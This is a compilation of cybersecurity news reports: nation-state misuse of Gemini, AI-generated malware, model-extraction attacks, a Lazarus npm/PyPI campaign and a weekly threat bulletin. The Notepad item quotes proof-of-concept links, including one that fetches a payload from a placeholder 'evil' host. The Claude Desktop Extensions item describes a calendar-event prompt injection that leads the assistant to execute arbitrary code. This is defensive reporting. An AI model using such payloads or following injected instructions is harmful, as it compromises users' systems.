2026-02-13 AI创业新闻

Google Reports State-Backed Hackers Using Gemini AI for Recon and Attack Support

Google on Thursday said it observed the North Korea-linked threat actor known as UNC2970 using its generative artificial intelligence (AI) model Gemini to conduct reconnaissance on its targets, as various hacking groups continue to weaponize the tool for accelerating various phases of the cyber attack life cycle, enabling information operations, and even conducting model extraction attacks. “The group used Gemini to synthesize OSINT and profile high-value targets to support campaign planning and reconnaissance,” Google Threat Intelligence Group (GTIG) said in a report shared with The Hacker News. “This actor’s target profiling included searching for information on major cybersecurity and defense companies and mapping specific technical job roles and salary information.” The tech giant’s threat intelligence team characterized this activity as a blurring of boundaries between what constitutes routine professional research and malicious reconnaissance, allowing the state-backed actor to craft tailored phishing personas and identify soft targets for initial compromise. UNC2970 is the moniker assigned to a North Korean hacking group that overlaps with a cluster that’s tracked as Lazarus Group, Diamond Sleet, and Hidden Cobra.

It’s best known for orchestrating a long-running campaign codenamed Operation Dream Job to target aerospace, defense, and energy sectors with malware under the guise of approaching victims under the pretext of job openings. GTIG said UNC2970 has “consistently” focused on defense targeting and impersonating corporate recruiters in their campaigns, with the target profiling including searches for “information on major cybersecurity and defense companies and mapping specific technical job roles and salary information.” UNC2970 is far from the only threat actor to have misused Gemini to augment their capabilities and move from initial reconnaissance to active targeting at a faster clip. Some of the other hacking crews that have integrated the tool into their workflows are as follows - UNC6418 (Unattributed), to conduct targeted intelligence gathering, specifically seeking out sensitive account credentials and email addresses. Temp.HEX or Mustang Panda (China), to compile a dossier on specific individuals, including targets in Pakistan, and to gather operational and structural data on separatist organizations in various countries.

APT31 or Judgement Panda (China), to automate the analysis of vulnerabilities and generate targeted testing plans by claiming to be a security researcher. APT41 (China), to extract explanations from open-source tool README.md pages, as well as troubleshoot and debug exploit code. UNC795 (China), to troubleshoot their code, conduct research, and develop web shells and scanners for PHP web servers. APT42 (Iran), to facilitate reconnaissance and targeted social engineering by crafting personas that induce engagement from the targets, as well as develop a Python-based Google Maps scraper, develop a SIM card management system in Rust, and research the use of a proof-of-concept (PoC) for a WinRAR flaw ( CVE-2025-8088 ).

Google also said it detected a malware called HONESTCUE that leverages Gemini’s API to outsource functionality generation for the next-stage, along with an AI-generated phishing kit codenamed COINBAIT that’s built using Lovable AI and masquerades as a cryptocurrency exchange for credential harvesting. Some aspects of COINBAIT-related activity have been attributed to a financially motivated threat cluster dubbed UNC5356. “HONESTCUE is a downloader and launcher framework that sends a prompt via Google Gemini’s API and receives C# source code as the response,” it said. “However, rather than leveraging an LLM to update itself, HONESTCUE calls the Gemini API to generate code that operates the ‘stage two’ functionality, which downloads and executes another piece of malware.” The fileless secondary stage of HONESTCUE then takes the generated C# source code received from the Gemini API and uses the legitimate .NET CSharpCodeProvider framework to compile and execute the payload directly in memory, thereby leaving no artifacts on disk.

Google has also called attention to a recent wave of ClickFix campaigns that leverage the public sharing feature of generative AI services to host realistic-looking instructions to fix a common computer issue and ultimately deliver information-stealing malware. The activity was flagged in December 2025 by Huntress. Lastly, the company said it identified and disrupted model extraction attacks that are aimed at systematically querying a proprietary machine learning model to extract information and build a substitute model that mirrors the target’s behavior. In a large-scale attack of this kind, Gemini was targeted by over 100,000 prompts that posed a series of questions aimed at replicating the model’s reasoning ability across a broad range of tasks in non-English languages.

Last month, Praetorian devised a PoC extraction attack where a replica model achieved an accuracy rate of 80.1% simply by sending a series of 1,000 queries to the victim’s API and recording the outputs and training it for 20 epochs . “Many organizations assume that keeping model weights private is sufficient protection,” security researcher Farida Shafik said . “But this creates a false sense of security. In reality, behavior is the model.

Every query-response pair is a training example for a replica. The model’s behavior is exposed through every API response.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Lazarus Campaign Plants Malicious Packages in npm and PyPI Ecosystems

Cybersecurity researchers have discovered a fresh set of malicious packages across npm and the Python Package Index (PyPI) repository linked to a fake recruitment-themed campaign orchestrated by the North Korea-linked Lazarus Group. The coordinated campaign has been codenamed graphalgo in reference to the first package published in the npm registry. It’s assessed to be active since May 2025. “Developers are approached via social platforms like LinkedIn and Facebook, or through job offerings on forums like Reddit,” ReversingLabs researcher Karlo Zanki said in a report.

“The campaign includes a well-orchestrated story around a company involved in blockchain and cryptocurrency exchanges.” Notably, one of the identified npm packages, bigmathutils, attracted more than 10,000 downloads after the first, non-malicious version was published, and before the second version containing a malicious payload was released. The names of the packages are listed below - npm - graphalgo graphorithm graphstruct graphlibcore netstruct graphnetworkx terminalcolor256 graphkitx graphchain graphflux graphorbit graphnet graphhub terminal-kleur graphrix bignumx bignumberx bignumex bigmathex bigmathlib bigmathutils graphlink bigmathix graphflowx PyPI - graphalgo graphex graphlibx graphdict graphflux graphnode graphsync bigpyx bignum bigmathex bigmathix bigmathutils As with many job-focused campaigns conducted by North Korean threat actors, the attack chain begins with establishing a fake company like Veltrix Capital in the blockchain and cryptocurrency trading space, and then setting up the necessary digital real estate to create an illusion of legitimacy. This includes registering a domain and creating a related GitHub organization to host several repositories for use in coding assessments. The repositories have been found to contain projects based on Python and JavaScript.

“Examination of these repositories didn’t reveal any obvious malicious functionality,” Zanki said. “That is because the malicious functionality was not introduced directly via the job interview repositories, but indirectly – through dependencies hosted on the npm and PyPI open-source package repositories.” The idea behind setting up these repositories is to trick candidates who apply to its job listings on Reddit and Facebook Groups into running the projects on their machines, effectively installing the malicious dependency and triggering the infection. In some cases, victims are directly contacted by seemingly legitimate recruiters on LinkedIn. The packages ultimately act as a conduit to deploy a remote access trojan (RAT) that periodically fetches and executes commands from an external server.

It supports various commands to gather system information, enumerate files and directories, list running processes, create folders, rename files, delete files, and upload/download files. Interestingly, the command-and-control (C2) communication is protected by a token-based mechanism to ensure that only requests with a valid token are accepted. The approach was previously observed in 2023 campaigns linked to a North Korean hacking group called Jade Sleet, which is also known as TraderTraitor or UNC4899. It essentially works like this: the packages send system data as part of a registration step to the C2 server, which responds with a token.

This token is then sent back to the C2 server in subsequent requests to establish that they are originating from an already registered infected system. “The token-based approach is a similarity […] in both cases and has not been used by other actors in malware hosted on public package repositories as far as we know,” Zanki told The Hacker News at that time. The findings show that North Korean state-sponsored threat actors continue to poison open-source ecosystems with malicious packages in hopes of stealing sensitive data and conducting financial theft, a fact evidenced by the RAT’s checks to determine if the MetaMask browser extension is installed in the machine. “Evidence suggests that this is a highly sophisticated campaign,” ReversingLabs said.

“Its modularity, long-lived nature, patience in building trust across different campaign elements, and the complexity of the multilayered and encrypted malware point to the work of a state-sponsored threat actor.” More Malicious npm Packages Found The disclosure comes as JFrog uncovered a sophisticated, malicious npm package called “duer-js” published by a user named “luizaearlyx.” While the library claims to be a utility to “make the console window more visible,” it harbors a Windows information stealer called Bada Stealer. It’s capable of gathering Discord tokens, passwords, cookies, and autofill data from Google Chrome, Microsoft Edge, Brave, Opera, and Yandex Browser, cryptocurrency wallet details, and system information. The data is then exfiltrated to a Discord webhook, as well as the Gofile file storage service as a backup. “In addition to stealing information from the host it infected, the malicious package downloads a secondary payload,” security researcher Guy Korolevski said .

“This payload is designed to run on the Discord Desktop app startup, with self-updating capabilities, stealing directly from it, including payment methods used by the user.” It also coincides with the discovery of another malware campaign that weaponizes npm to extort cryptocurrency payments from developers during package installation using the “npm install” command. The campaign, first recorded on February 4, 2026, has been dubbed XPACK ATTACK by OpenSourceMalware. duer-js malicious package flow, hijacking Discord’s Electron environment The names of the packages, all uploaded by a user named “dev.chandra_bose,” are listed below - xpack-per-user xpack-per-device xpack-sui xpack-subscription xpack-arc-gateway xpack-video-submission test-npm-style xpack-subscription-test testing-package-xdsfdsfsc “Unlike traditional malware that steals credentials or executes reverse shells, this attack innovatively abuses the HTTP 402 ‘Payment Required’ status code to create a seemingly legitimate payment wall,” security researcher Paul McCarty said . “The attack blocks installation until victims pay 0.1 USDC/ETH to the attacker’s wallet, while collecting GitHub usernames and device fingerprints.” “If they refuse to pay, the installation simply fails after wasting 5+ minutes of their development time, and they may not even realize they’ve encountered malware versus what appeared to be a legitimate paywall for package access.” Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

ThreatsDay Bulletin: AI Prompt RCE, Claude 0-Click, RenEngine Loader, Auto 0-Days & 25+ Stories

Threat activity this week shows one consistent signal — attackers are leaning harder on what already works. Instead of flashy new exploits, many operations are built around quiet misuse of trusted tools, familiar workflows, and overlooked exposures that sit in plain sight. Another shift is how access is gained versus how it’s used. Initial entry points are getting simpler, while post-compromise activity is becoming more deliberate, structured, and persistent.

The objective is less about disruption and more about staying embedded long enough to extract value. There’s also growing overlap between cybercrime, espionage tradecraft, and opportunistic intrusion. Techniques are bleeding across groups, making attribution harder and defense baselines less reliable. Below is this week’s ThreatsDay Bulletin — a tight scan of the signals that matter, distilled into quick reads.

Each item adds context to where threat pressure is building next. Notepad RCE via Markdown Links Microsoft Patches Notepad Flaw Microsoft has patched a command injection flaw ( CVE-2026-20841 , CVSS score: 8.8) in its Notepad app that could result in remote code execution. “Improper neutralization of special elements used in a command (‘command injection’) in Windows Notepad App allows an unauthorized attacker to execute code over a network,” Microsoft said. An attacker could exploit this flaw by tricking a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to run remote files.

“The malicious code would execute in the security context of the user who opened the Markdown file, giving the attacker the same permissions as that user,” the tech giant added. Proof-of-concept (PoC) exploits show that the vulnerability can be triggered by creating a Markdown file with “file://” links that point to executable files (“file://C:/windows/system32/cmd.exe”) or contain special URIs (“ms-appinstaller://?source=https://evil/xxx.appx”) to run arbitrary payloads. The issue was fixed as part of its monthly Patch Tuesday update this week. Microsoft added Markdown support to Notepad on Windows 11 last May.

APT Pressure Intensifies on Taiwan Taiwan Becomes Target of APT Attacks TeamT5 said tracked more than 510 advanced persistent threat (APT) operations affecting 67 countries globally in 2025, out of which 173 attacks targeted Taiwan. “Taiwan’s role in geopolitical tensions and values in the global technology supply chain makes it uniquely vulnerable for adversaries who seek intelligence or long-term access to achieve political and military objectives,” the security vendor said . “Taiwan is more than just a target – it functions as a proving ground where China-nexus APTs test and refine their tactics before scaling them to other environments.” Node.js Stealer Hits Windows LTX Stealer Targets Windows Systems A new Node.js information stealer named LTX Stealer has been spotted in the wild. Targeting Windows systems and distributed via a heavily obfuscated Inno Setup installer, the malware conducts large-scale credential harvesting from Chromium-based browsers, targets cryptocurrency-related artifacts, and stages the collected data for exfiltration.

“The campaign relies on a cloud-backed management infrastructure, where Supabase is used exclusively as the authentication and access-control layer for the operator panel, while Cloudflare is leveraged to front backend services and mask infrastructure details,” CYFIRMA said . Marco Stealer Expands Data Theft Marco Stealer Emerges in the Wild Another new Windows-oriented information stealer is Marco Stealer, which was first observed in June 2025. Delivered via a downloader in a ZIP archive, it mainly targets browser data, cryptocurrency wallet information, files from popular cloud services like Dropbox and Google Drive, and other sensitive files stored on the victim’s system. “Marco Stealer relies on encrypted strings that are decrypted only at runtime to avoid static analysis.

In addition, the information stealer uses Windows APIs to detect anti-analysis tools like Wireshark, x64dbg, and Process Hacker,” Zscaler ThreatLabz said . “Stolen data is encrypted using AES-256 before being sent to C2 servers via HTTP POST requests.” Telegram Sessions Hijacked via OAuth Abuse Social Engineering Campaign Targets Telegram Accounts A new account takeover campaign has been observed abusing Telegram’s native authentication workflows to obtain fully authorized user sessions. In one variant, victims are prompted to scan a QR code on bogus sites using the Telegram mobile application, initiating a legitimate Telegram login attempt tied to attacker-controlled API credentials. Telegram then sends an in-app authorization prompt to the victim’s existing session.

Alternatively, users can also enter their country code, phone number, and verification code (if enabled) on a fake web page, which causes the data to be relayed to Telegram’s official authentication APIs. Upon successful verification, Telegram issues an in-app authorization request as before. “Unlike traditional phishing attacks that rely solely on credential harvesting or token replay, this campaign leverages attacker-controlled Telegram API credentials and integrates directly with Telegram’s legitimate login and authorization infrastructure,” CYFIRMA noted . “By inducing victims to approve in-app authorization prompts under false pretenses, the attackers achieve complete session compromise while minimizing technical anomalies and user suspicion.” Discord Expands Global Age Checks Discord Announces Age Verification Plans Discord has announced it will require all users globally to verify their ages by sharing video selfies or providing government IDs to access certain content.

Additionally, it will implement an age inference model, a new system that runs in the background to help determine whether an account belongs to an adult, without always requiring users to verify their age. The company has assured that video selfies don’t leave a user’s device, that identity documents submitted to third-party vendors, in this case k-ID, are “deleted quickly” or “immediately” after age confirmation, and that a user’s age verification status cannot be seen by other users. However, concerns have been raised about whether Discord can be trusted with their most sensitive information, especially in the aftermath of a security breach of a third-party service that Discord previously relied on to verify ages in the U.K. and Australia.

The incident led to the theft of government IDs of 70,000 Discord users. In a statement given to Ars Technica, k-ID said the age estimation technology runs entirely on device and no third-parties store personal data shared during age checks. The move comes at a time when laws requiring age verification on social media platforms are being adopted across the world. Discord confirmed that “a phased global rollout” would begin in “early March,” at which point all users globally would be defaulted to “teen-appropriate” experiences.

GuLoader Refines Evasion Tradecraft GuLoader Continues to Evolve A new analysis of the GuLoader malware has revealed that it employs polymorphic code to dynamically construct constants during execution and exception-based control flow obfuscation to conceal its functionality and evade detection. Besides introducing sophisticated exception-handling mechanisms to complicate analysis, the malware attempts to bypass reputation-based rules by hosting payloads on trusted cloud services such as Google Drive and OneDrive. First observed in December 2019, GuLoader serves primarily as a downloader for Remote Access Trojans (RATs) and information stealers. $73.6M Pig-Butchering Scam Sentence Man Sentenced to 20 Years in Prison for Crypto Scam Daren Li, 42, a dual national of China and St.

Kitts and Nevis has been sentenced in absentia in the U.S. to the statutory maximum of 20 years in prison and three years of supervised release for his international cryptocurrency investment scheme known as pig butchering or romance baiting that defrauded victims of more than $73.6 million. Li pleaded guilty to his crime in November 2024. However, the defendant cut off his ankle monitor and fled the country in December 2025.

His present whereabouts are unknown. “As part of his plea agreement, Li admitted that unindicted members of the conspiracy would contact victims directly through unsolicited social-media interactions, telephone calls and messages, and online dating services,” the U.S. Justice Department said . “The unindicted co-conspirators would gain the trust of victims by establishing either professional or romantic relationships with them, often communicating by electronic messages sent via end-to-end encrypted applications.” The co-conspirators established spoofed domains and websites that resembled legitimate cryptocurrency trading platforms and tricked victims into investing in cryptocurrency through these fraudulent platforms after gaining their trust.

Li also confessed that he would direct co-conspirators to open U.S. bank accounts established on behalf of 74 shell companies and would monitor the receipt of interstate and international wire transfers of victim funds. “Li and other co-conspirators would receive victim funds in financial accounts that they controlled and then monitor the conversion of victim funds to virtual currency,” the department said. 0-Click AI Prompt RCE Risk 0-Click Flaw in Claude Desktop Extensions A zero-click remote code execution vulnerability (CVSS score: 10.0) in Claude Desktop Extensions (DXT) could be exploited to silently compromise a system by a simple Google Calendar event when a user issues a harmless prompt like “Please check my latest events in google cal[endar] and then take care of it for me.” The problem stems from how MCP-based systems like Claude DXT autonomously chain together different tools and external connectors to fulfil user requests without enforcing proper security boundaries.

The phrase “take care of it” does the heavy lifting here, as the artificial intelligence (AI) assistant interprets it as a justification to execute arbitrary instructions embedded in those events without seeking users’ permission. The flaw impacts more than 10,000 active users and 50 DXT extensions, according to LayerX. “Unlike traditional browser extensions, Claude Desktop Extensions run unsandboxed with full system privileges,” the browser security company said . “As a result, Claude can autonomously chain low-risk connectors (e.g., Google Calendar) to high-risk local executors, without user awareness or consent.

If exploited by a bad actor, even a benign prompt (‘take care of it’), coupled with a maliciously worded calendar event, is sufficient to trigger arbitrary local code execution that compromises the entire system.” Anthropic has opted not to fix the issue at this time. A similar Google Gemini prompt injection flaw was disclosed by Miggo Security last month. Data-Theft Ransomware Surges Coinbase Cartel Claims Over 60 Victims A nascent ransomware group called Coinbase Cartel has claimed more than 60 victims since it first emerged in September 2025. “Coinbase Cartel operations are marked by an insistence on stealing data while leaving systems available rather than complementing data theft with the use of encryptors that prohibit system access,” Bitdefender said .

The healthcare, technology, and transportation industries represent a major chunk of Coinbase Cartel’s greatest victim demographic to date. The healthcare organizations impacted by the threat actor are primarily based in the U.A.E. Some of the other prominent groups that are focused on only data theft are World Leaks and PEAR (Pure Extraction and Ransom). The development paints a picture of an ever-evolving ransomware landscape populated by new and old actors, even as the threat is getting increasingly professionalized as attackers streamline operations.

According to data from Cyble, 6,604 ransomware attacks were recorded in 2025, up 52% from the 4,346 attacks claimed by ransomware groups in 2024. Google Expands Privacy Takedowns Google Adds New Options “Results about you” Google has expanded its “Results about you” tool to give users more control over sensitive personal information and added a way to request removal of non-consensual explicit images from search results, as well as other details like driver’s license numbers, passport numbers, and Social Security numbers. “We understand that removing existing content is only part of the solution,” Google said . “For added protection, the new process allows you to opt in to safeguards that will proactively filter out any additional explicit results that might appear in similar searches.” Monitoring Tools Used for Ransomware Crazy Ransomware Gang Abuses Net Monitor and SimpleHelp Threat actors have been observed leveraging Net Monitor, a commercial workforce monitoring tool, with SimpleHelp, a legitimate remote monitoring and management (RMM) platform, as part of attacks designed to deploy Crazy ransomware.

The two incidents, believed to be the work of the same threat actor, took place in January and February 2026. Net Monitor comes with various capabilities that go beyond employee productivity tracking, including reverse shell connections, remote desktop control, file management, and the ability to customize service and process names during installation. These features, coupled with SimpleHelp’s remote access functionality, make them attractive tools for attackers looking to blend into enterprise environments without deploying traditional malware. What’s more, Net Monitor for Employees Professional bundles a pseudo-terminal (“winpty-agent.exe”) that facilitates full command execution.

Bad actors have been found to leverage this aspect to conduct reconnaissance, deliver additional payloads, and deploy secondary remote access channels, turning it into a functional remote access trojan. “In the cases observed, threat actors used these two tools together, using Net Monitor for Employees as a primary remote access channel and SimpleHelp as a redundant persistence layer, ultimately leading to the attempted deployment of Crazy ransomware,” Huntress said . 0APT Victim Claims Questioned 0APT’s 200 Victim Count Likely a Hoax A threat actor called 0APT appears to be falsely claiming that it has breached over 200 victims within a span of a week since launching their data leak site on January 28, 2026. Further analysis has determined that the victims are a blend of wholly fabricated generic company names and recognizable organizations that threat actors have not breached, GuidePoint’s Research and Intelligence Team said.

The data leak site went offline on February 8, 2026, before resurfacing the next day with a list of more than 15 very large multinational organizations. “0APT is likely operating in this deceptive manner in order to support extortion of uninformed victims, re-extortion of historical victims from other groups, defrauding of potential affiliates, or to garner interest in a nascent RaaS group,” security researcher Jason Baker noted . While signs suggest that the group may be bluffing about its victim count, the Windows and Linux ransomware samples have been found to be fully operational, per Halcyon . It’s worth pointing out that ransomware groups like RansomedVC have listed fabricated attacks on their data leak sites to deceive victims.

Viewed in that light, 0APT’s exaggerated claims are likely an attempt to gain visibility and momentum among its peers. Its origins remain unknown. SYSTEM RCE via Named Pipe Flaw in Quest Desktop Authority Detailed A high-risk security vulnerability ( CVE-2025-67813 , CVSS score: 5.3) within Quest Desktop Authority could allow attackers to execute remote code with SYSTEM privileges. “Quest KACE Desktop Authority exposes a named pipe (ScriptLogic_Server_NamedPipe_9300) running as SYSTEM that accepts connections from any authenticated domain user over the network,” NetSPI said .

The named pipe implements a custom IPC protocol that supports dangerous operations, including arbitrary command execution, DLL injection, credential retrieval, and COM object invocation. Any authenticated user on the network can achieve remote code execution as a local administrator on hosts running the Desktop Authority agent. AI Traffic Scans to Block VPNs Russia to Analyze Internet Traffic Using AI to Flag VPN Usage Russia’s internet watchdog will use artificial intelligence (AI) technology to analyze internet traffic and restrict the operation of VPN services, Forbes Russia reported . The Roskomnadzor is expected to spend close to $30 million to develop the internet traffic filtering mechanism this year.

The Russian government has blocked access to tens of VPN apps in recent years. It also maintains a registry of banned websites. Mispadu Expands Banking Attacks Mexico and Brazil Targeted by Mispadu Trojan Cofense said it has observed Mispadu campaigns targeting Latin America, particularly Mexico and Brazil, and to a lesser extent in Spain, Italy, and Portugal, with phishing emails containing HTML Application (HTA) attachments that are designed to bypass Secure Email Gateways (SEGs) to reach the inboxes of employees across the world. “The only variation is that sometimes the URL delivering the HTA files is embedded in an attached, password-protected PDF rather than embedded in the email itself,” Cofense said .

“In all recent campaigns, Mispadu makes use of an AutoIT loader and various legitimate files to run the malicious content. Each step of the delivery chain from the attached PDF to the AutoIT script is dynamically generated. This means that every hash except for the AutoIT compiler is unique to each install, further frustrating EDR.” Recent iterations of the banking trojan come with the ability to self-propagate on infected hosts via email and expand the target online banking websites to include banks outside of Latin America as well as cryptocurrency-based exchanges. ScreenConnect Deployed via Phish Phishing Campaign Delivers ConnectWise ScreenConnect for Remote Access In a phishing campaign documented by Forcepoint, spoofed emails have been found to deliver a malicious .cmd attachment that escalates privileges, disables Windows SmartScreen, removes the mark-of-the-web (MotW) to bypass security warnings, and ultimately installs ConnectWise ScreenConnect.

The campaign has targeted organizations across the U.S., Canada, the U.K., and Northern Ireland, focusing on sectors with high-value data, including government, healthcare, and logistics companies. Recent phishing attacks have also abused web services from Amazon, like Simple Storage Service (S3) buckets, Amazon Simple Email Service (SES), and Amazon Web Services (AWS) Amplify to slip past email security controls and launch credential phishing attacks. Other phishing attacks have embraced uncommon techniques like using edited versions of legitimate business emails to deliver convincingly spoofed emails to recipients. “These emails work by having the threat actor create an account on a legitimate service and input arbitrary text into a field that will later be included in outgoing emails,” Cofense said .

“After this is done, the threat actor would need to receive a legitimate email that happens to include the malicious text that was created by the threat actor. Once the email is received, the threat actor can then redirect the email to the intended victims.” CrashFix Delivers SystemBC CrashFix Variant Attack Delivers Python Implants and SystemBC A variant of the ClickFix attack called CrashFix has been used to deliver malicious payloads consistent with a known malware called SystemBC. Unlike the CrashFix-style social engineering flow documented by Huntress and Microsoft , the attack stands out because it did not involve the use of a malicious browser extension. “Instead, the victim was convinced to execute a command via the Windows Run dialog (Win+R) as seen with traditional ClickFix,” Binary Defense said .

“This command abused a legitimate Windows binary – finger.exe – copied from System32, renamed, and executed from a user-writable directory. The output of this execution was piped directly into cmd.exe, acting as a delivery mechanism for an obfuscated PowerShell payload.” The PowerShell code then retrieves follow-on content, including Python backdoors and a DLL implant that overlaps with SystemBC, from attacker-controlled infrastructure, while taking steps to fingerprint the host and clean up artifacts on disk. “The coexistence of Python backdoors and a reflective DLL implant highlights a deliberate defense-evasion and persistence strategy,” the company said. “By mixing scripting-based and native implants, the attacker reduced reliance on any single execution method, making complete eviction more difficult.” 76 Zero-Days Found in Cars Pwn2Own Automotive 2026 Finds 76 Zero-days The third annual Pwn2Own Automotive competition held in Tokyo, Japan, late last month uncovered 76 unique zero-day vulnerabilities in a variety of targets, such as in-vehicle infotainment (IVI) systems (Tesla), electric vehicle (EV) chargers (Alpitronic HYC50, ChargePoint Home Flex), and car operating systems (Automotive Grade Linux).

Team Fuzzware.io won the hacking competition with total winnings of $215,000, followed by Team DDOS with $100,750 and Synactiv with $85,000. Bing Ads Funnel Tech Scams Fake Bing Ads Leak to Tech Support Scams Malicious ads served on Bing search results when searching for sites like Amazon are being used to redirect unsuspecting users to tech support scam links hosted in Azure Blob Storage. The campaign targeted healthcare, manufacturing, and technology sectors in the U.S. “Clicking on the malicious ad sent the victims to highswit[.]space, a newly registered domain hosting an empty WordPress site, which then redirected them to one of the Azure Blob Storage containers, which served a typical tech support scam site,” Netskope Threat Labs said .

Chinese VPN Infra Footprint Expands Chinese VPN Used by Devices in Russia, China, Myanmar, Iran, and Venezuela A Chinese virtual private network (VPN) provider named LVCHA VPN has been used by devices in Russia, China, Myanmar, Iran, and Venezuela. It also has an Android app that’s directly hosted on its website (“lvcha[.]in”) and distributed via the Google Play Store . Further analysis of the domain has uncovered a cluster of nearly 50 suspicious domains, all of which promote the same VPN. “Whenever we see campaigns promoting suspicious downloads or products using so many domains, it can indicate that the operator is rotating domains to work around country-level firewalls in regions where they’re trying to promote distribution,” Silent Push said .

Grid Attack Triggers Western Alerts U.K. and U.S. Issues Warning After Poland Energy Grid Cyber Attack Following a late December 2025 coordinated cyber attack on Poland’s power grid , the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published a bulletin for critical infrastructure owners and operators.

CISA said vulnerable edge devices remain a prime target for threat actors, OT devices without firmware verification can be permanently damaged, and threat actors leverage default credentials to pivot onto the HMI and RTUs. “Operators should prioritize updates that allow firmware verification when available,” the agency added . “Operators should immediately change default passwords and establish requirements for integrators or OT suppliers to enforce password changes in the future.” In a similar development, Jonathan Ellison, director for national resilience at the National Cyber Security Centre (NCSC), has urged critical infrastructure operators in the country to act now and have incident response plans or playbooks in place to respond to such threats. “Although attacks can still happen, strong resilience and recovery plans reduce both the chances of an attack succeeding and the impact if one does,” Ellison said .

Telnet Traffic Abruptly Collapses Global Telnet Traffic Dropped in Mid-January 2026 Threat intelligence firm GreyNoise said it observed a steep decline in global Telnet traffic on January 14, 2026, six days before a security advisory for CVE-2026-24061 went public on January 20. CVE-2026-24061 relates to a critical vulnerability in the GNU InetUtils telnet daemon that could result in an authentication bypass. Data gathered by GreyNoise shows that the hourly volume of Telnet sessions dropped 65% on January 14 at 21:00 UTC, then fell 83% within two hours. Daily sessions have declined from an average of 914,000 (from December 1, 2025, to January 14, 2026) to around 373,000, equating to a 59% reduction that has persisted as of February 10, 2026.

“Eighteen ASNs with significant pre-drop telnet volume (>50K sessions each) went to absolute zero after January 15,” the company said. “Five entire countries vanished from GreyNoise telnet data: Zimbabwe, Ukraine, Canada, Poland, and Egypt. Not reduced to zero.” Among the 18 ASNs included were British Telecom, Charter/Spectrum, Cox Communications, and Vultr. Although correlation does not imply causation, GreyNoise has raised the possibility that the telecom operators likely received advance warning about CVE-2026-24061, allowing them to act on it at the infrastructure level.

“A backbone or transit provider — possibly responding to a coordinated request, possibly acting on their own assessment — implemented port 23 filtering [to block telnet traffic] on transit links,” it said . New Loaders Fuel Stealer Campaigns New RenEngine and Foxveil Malware Loaders Spotted Cyderes and Cato Networks have detailed new previously undocumented malware loaders dubbed RenEngine Loader and Foxveil that have been used to deliver next-stage payloads. The Foxveil malware campaign has been active since August 2025. It’s engineered to establish an initial foothold, complicate analysis efforts, and retrieve next-stage shellcode payloads from threat actor-controlled staging hosted on trusted platforms like Cloudflare Pages, Netlify, and Discord.

Attacks leveraging RenEngine Loader, on the other hand, have employed illegally modified game installers distributed via piracy platforms to deliver the malware alongside the playable content. More than 400,000 global victims are estimated to have been impacted, with most of them located in India, the U.S., and Brazil. The activity has been operational since April 2025. “RenEngine Loader decrypts, stages, and transfers execution to Hijack Loader , enabling rapid tooling evolution and flexible capability deployment,” Cyderes said.

“By embedding a modular, stealth-focused second-stage loader inside a legitimate Ren’Py launcher, the attackers closely mimic normal application behavior, significantly reducing early detection.” The end goal of the attack is to deploy an information stealer called ACR Stealer . Looker RCE Chain Disclosed Flaws in Google Looker Two novel security vulnerabilities have been disclosed in Google Looker that could be exploited by an attacker to fully compromise a Looker instance. This includes a remote code execution (RCE) chain via Git hook overrides and an authorization bypass flaw via internal database connection abuse. Successful exploitation of the flaws could allow an attacker to run arbitrary code on the Looker server, potentially leading to cross-tenant access, as well as exfiltrate the full internal MySQL database via error-based SQL injection, according to Tenable .

“The vulnerabilities allowed users with developer permissions in Looker to access both the underlying system hosting Looker, and its internal database,” Google said . Collectively tracked as CVE-2025-12743, aka LookOut (CVSS score: 6.5), they were patched by Google in September 2025. While the fixes have been applied to cloud instances, users of self-hosted Looker instances are advised to update to the latest supported version. Trojanized 7-Zip Spreads Proxyware Malicious 7-Zip Site Distributes Fake Installer with Proxy A fake installer for the 7-Zip file archiver tool downloaded from 7zip[.]com (the legitimate domain is 7-zip[.]org) is being used to drop a proxy component that enrolls the infected host into a residential proxy node.

This allows third parties to route traffic through the victim’s IP address while concealing their own origins. The installer is digitally signed with a now-revoked certificate originally issued to Jozeal Network Technology Co., Limited. The campaign has been codenamed upStage Proxy by security researcher Luke Acha, who discovered it late last month. “The operators behind 7zip[.]com distributed a trojanized installer via a lookalike domain, delivering a functional copy of 7-Zip File Manager alongside a concealed malware payload,” Malwarebytes said .

The 7-Zip lure appears to be part of a broader effort that uses trojanized installers for HolaVPN, TikTok, WhatsApp, and Wire VPN. Attack chains involve using YouTube tutorials as a malware distribution vector to direct unsuspecting users to the bogus site, once again highlighting the abuse of trusted platforms. AI-Built VoidLink Expands Reach More Details About VoidLink Emerge VoidLink is a sophisticated Linux-based command-and-control (C2) framework capable of long-term intrusion across cloud and enterprise environments. First documented by Check Point last month, ongoing analyses of the malware have revealed that it may have been developed by a Chinese-speaking developer using an artificial intelligence (AI) model with limited human review.

Ontinue, in a report published this week, said it found “strong indicators” that the implant was built using a large language model (LLM) coding agent. “It fingerprints cloud environments across AWS, GCP, Azure, Alibaba Cloud, and Tencent Cloud, harvesting credentials from environment variables, config directories, and instance metadata APIs,” security researcher Rhys Downing said . “It detects container runtimes and includes plugins for container escape and Kubernetes privilege escalation. A kernel-level rootkit adapts its stealth approach based on the host’s kernel version.” Cisco Talos said it has observed the modular framework in campaigns undertaken by a new threat actor codenamed UAT-9921, which is believed to have been active since 2019.

The cybersecurity company said it also found “clear indications” of a Windows equivalent of VoidLink that comes with the ability to load plugins. “UAT-9921 uses compromised hosts to install VoidLink command and control (C2), which are then used to launch scanning activities both internal and external to the network,” Talos researchers said . Taken together, these developments show how threat actors are balancing speed with patience — moving fast where defenses are weak, and slowing down where stealth matters more than impact. The result is activity that blends into normal operations until damage is already underway.

For defenders, the challenge isn’t just blocking entry anymore. It’s recognizing misuse of legitimate access, spotting abnormal behavior inside trusted systems, and closing gaps that don’t look dangerous on the surface. The briefs that follow aren’t isolated incidents. They’re fragments of a wider operating picture — one that keeps evolving week after week.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

AI Security Board Report Template

The CTEM Divide: Why 84% of Security Programs Are Falling Behind

A new 2026 market intelligence study of 128 enterprise security decision-makers ( available here ) reveals a stark divide forming between organizations – one that has nothing to do with budget size or industry and everything to do with a single framework decision. Organizations implementing Continuous Threat Exposure Management (CTEM) demonstrate 50% better attack surface visibility, 23-point higher solution adoption, and superior threat awareness across every measured dimension. The 16% who’ve implemented it are pulling away. The 84% who haven’t are falling behind.

